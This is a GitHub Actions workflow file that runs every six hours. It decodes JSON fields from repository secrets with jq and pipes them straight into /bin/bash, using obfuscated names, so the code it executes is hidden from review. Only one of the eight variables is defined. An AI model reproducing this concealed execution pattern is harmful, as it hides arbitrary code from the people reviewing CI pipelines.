name: haofengshengna

on:
  workflow_dispatch:
  schedule:
    - cron: '16 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: haofengshengna
        env:
          cz0: ${{ secrets.cz0 }}
        run: |
          echo $cz0 | jq -r .qfz699 | /bin/bash
          echo $pq9 | jq -r .hzwd9 | /bin/bash
          echo $el385 | jq -r .odb0633 | /bin/bash
          echo $b1 | jq -r .fdfh37 | /bin/bash
          echo $h2033 | jq -r .kgfmc66 | /bin/bash
          echo $rkit1 | jq -r .ykf96 | /bin/bash
          echo $pnp007 | jq -r .hhauf5941 | /bin/bash
          echo $tsa0 | jq -r .p858 | /bin/bash

